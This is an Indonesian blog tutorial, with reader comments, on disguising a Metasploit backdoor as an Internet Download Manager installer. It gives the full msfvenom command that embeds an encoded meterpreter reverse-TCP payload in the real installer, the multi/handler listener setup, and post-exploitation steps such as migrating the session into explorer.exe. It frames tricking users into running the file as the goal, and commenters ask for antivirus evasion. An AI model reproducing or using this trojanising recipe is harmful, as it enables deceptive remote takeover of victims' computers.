Sebelum melakukan eksploitasi ke sebuah sistem kita memerlukan backdoor yang digunakan untuk jalan masuk ke sistem korban. Agar exploit tersebut berjalan user diharuskan mengeksekusi backdoor tersebut, untuk itu kita diharuskan se-kreatif mungkin agar user tersebut mengesekusi backdoor yang dikirimkan, contohnya dengan menyamarkan backdoor  menyerupai file installer aplikasi.
Sebagai contoh kali ini saya akan menyamarkan backdoor seperti Installer Internet Download Manager (kalian juga dapat mencoba dengan file installer lainnya), disini tools yang digunakan adalah msfvenom dengan encoder shikata_ga_nai.
untuk melihat opsi dari perintah msfvenom ketikkan di terminal
msfvenom -h
msfvenom -h

Contoh disini file asli installer IDM saya berada di /root/Download/idman625build11.exe  dan hasil file outputnya akan saya simpan di folder /root/Desktop/IDMan.exe 
msfvenom -a x86 --platform windows -x /root/Downloads/idman625build11.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/IDMan.exe
msfvenom -a x86 --platform windows -x /root/Downloads/idman625build11.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o /root/Desktop/IDMan.exe

Keterangan :
- a adalah architecture yang digunakan
--platform adalah platform payload yang di buat
-x posisi atau letak file exe yang hendak di injeksi
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread baru
-p perintah untuk menentukan tipe payload
windows/meterpreter/reverse_tcp adalah tipe payload yang digunakan 
-lhost adalah alamat IP kita
-lport adalah yang akan kita gunakan dalam menjalankan listener ( reverse )
-e untuk memilih encoder yang digunakan
x86/shikata_ga_nai adalah encoder yang digunakan
-i iterations (jumlah encode payload)
-f format output
-o output hasil file yang telah di injeksi ( backdoor result )

Oke, selanjutnya kita uji coba backdoor tersebut, buka msfconsole
msfconsole
msfconsole

Selanjutnya gunakan perintah
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 4444
exploit
use multi/handler

Sesuaikan tipe PAYLOAD, LHOST dan LPORT dengan backdoor yang dibuat di atas

Langkah selanjutnya adalah mengirimkan backdoor tersebut ke target
Dibawah ini penampakan backdoor di komputer target

Detail backdoor
dilihat sepintas backdoor tersebut menyerupai file installer aslinya, icon dan detailnya pun sama 
Penampakan IDMan.exe di eksekusi

Backdoor di Eksekusi

Dan , Sesi meterpreter terbuka  :D

Meterpreter Sessions Opened

sysinfo

Meterpreter session akan closed, ketika target menutup file Installer tersebut, untuk  itu segera pindah ke prosses yang lain agar kita tetap mendapat sesi meterpreter, gunakan perintah
migrate 6108
migrate 6108

Contoh di atas saya pindah ke explorer.exe , untuk melihat Procces List ketikkan
ps
ps

Kita akan tetap terhubung dengan komputer target sampai koneksi target terputus atau target mematikan komputernya, nah bagaimana agar kita dapat masuk ke komputer target tanpa harus mengirimkan backdoor kembali? kita bisa membuat backdoor persistence, maksudnya adalah kita membuat backdoor permanen di dalam komputer target dan akan otomotis berjalan ketika startup, untuk caranya bisa di lihat pada postingan saya sebelumnya di Maintaining Acces dengan Persistence Metasploit.

Oke mungkin cukup itu yang bisa saya share kali ini tentang Cara Menyamarkan Backdoor Seperti File Installer, postingan ini ditujukan hanya untuk pemebelajaran semata, penyalahgunaan dari tutorial ini bukan tanggung jawab saya. Terimakasih
sumber www.offensive-security.com

Posting Komentar

  1. kalo dipindahin ke system bisa ga? XD

    BalasHapus
  2. Posting cara bikin backdoor yang nggak ke detect anti virus juga dong gan

    BalasHapus
  3. gimana caranya mengirim backdoor yang koneksi wifi.a berbeda gan

    BalasHapus

 
Top